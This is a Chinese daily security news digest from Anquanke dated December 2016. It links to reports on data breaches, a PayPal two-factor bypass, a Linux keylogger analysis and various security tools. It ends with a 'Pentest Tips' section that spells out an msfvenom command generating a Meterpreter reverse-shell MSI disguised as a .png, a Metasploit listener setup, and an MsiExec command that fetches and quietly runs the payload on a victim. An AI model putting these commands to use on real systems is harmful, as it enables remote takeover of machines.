【知识】12月19日 - 每日安全知识热点

阅读量85165

|

发布时间 : 2016-12-19 09:44:10

http://p6.qhimg.com/t017313015b51e6034e.png


热点概要:在线培训网站Lynda.com数据泄露、paypal双因子绕过漏洞细节、MiKey – 分析一款Linux下的键盘记录软件、对Naenara Browser 3.5 exploit的预览


国内热词(以下内容部分摘自http://www.cnbeta.com/):


偷换300多家商户收款二维码 两男子盗刷近百万元

网上回收摩拜单车开价2000元 ofo只卖99元

维基百科超过筹款目标 但继续要求捐钱

FBI、CIA指责俄罗斯为美国大选幕后黑手 奥巴马称将报复


资讯类:


Wikileaks公布德国NSA调查委员会的内部分类文件

http://electrospaces.blogspot.co.id/2016/12/wikileaks-publishes-classified.html


数据库泄露类:


在线培训网站Lynda.com数据被第三方非授权访问,官方重置55,000用户密码

http://www.theregister.co.uk/2016/12/18/linkedin_lynda_breach/

俄罗斯黑客销售美国选举援助委员会网站的权限和数据

https://www.recordedfuture.com/rasputin-eac-breach/

技术类:


paypal双因子绕过漏洞细节

http://tayyabqadir.com/2016/12/17/paypal-2fa-bypass-by-tayyab-qadir/

PowerShellArsenal:使用powershell编写的逆向模块,可以用来分析.NET恶意软件

https://github.com/mattifestation/PowerShellArsenal

Wifi-Dumper : 获取windows平台下wifi profiles中明文密码的工具

https://github.com/Viralmaniar/Wifi-Dumper

MiKey – 分析一款Linux下的键盘记录软件

http://www.morphick.com/resources/lab-blog/mikey-linux-keylogger

使用Vshot 和 Remnux进行内存取证(第一部分)

https://cyber-ir.com/2016/12/14/memory-forensics-with-vshot-and-remnux-1/

自动寻找Ian Beer's exploit的offset(仅仅支持_kernproc / _allproc)

https://gist.github.com/jndok/2a01a5885552571a69341a9700ac1bb0

一道Qrilee出的Android Crackme 

https://github.com/Qrilee/crackme

Implementing & mitigating covert channels in Dropbox 

http://cygnus.tele.pw.edu.pl/~wmazurczyk/art/Dropbox-CC.pdf

给ropper增加semantic search功能

https://scoding.de/semantic-search-in-ropper

使用Mobile Partner实现本地提权

https://osandamalith.com/2014/10/20/escalating-local-privileges-using-mobile-partner/

对Naenara Browser 3.5 exploit的预览

https://www.myhackerhouse.com/naenara-browser-3-5-exploit-jackrabbit/

Pentest Tips:


在本地执行远程恶意MSI文件的方法:

1.生成payload

msfvenom -f msi -p windows/meterpreter/reverse_tcp LHOST=10.18.180.148 LPORT=4444 > meterp.png

2.在攻击者的机器上监听端口,等待肉鸡上线

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.18.180.148
set ExitOnSession false
exploit -j -z

3.肉鸡上执行

MsiExec /i http://10.18.180.148:88/meterp.png /q

本文由adlab_mickey原创发布

转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/85146

安全客 - 有思想的安全新媒体

分享到:微信
+10赞
收藏
adlab_mickey
分享到:微信

发表评论

内容需知
  • 投稿须知
  • 转载须知
  • 官网QQ群8:819797106
  • 官网QQ群3:830462644(已满)
  • 官网QQ群2:814450983(已满)
  • 官网QQ群1:702511263(已满)
合作单位
  • 安全客
  • 安全客
Copyright © 北京奇虎科技有限公司 360网络攻防实验室 安全客 All Rights Reserved 京ICP备08010314号-66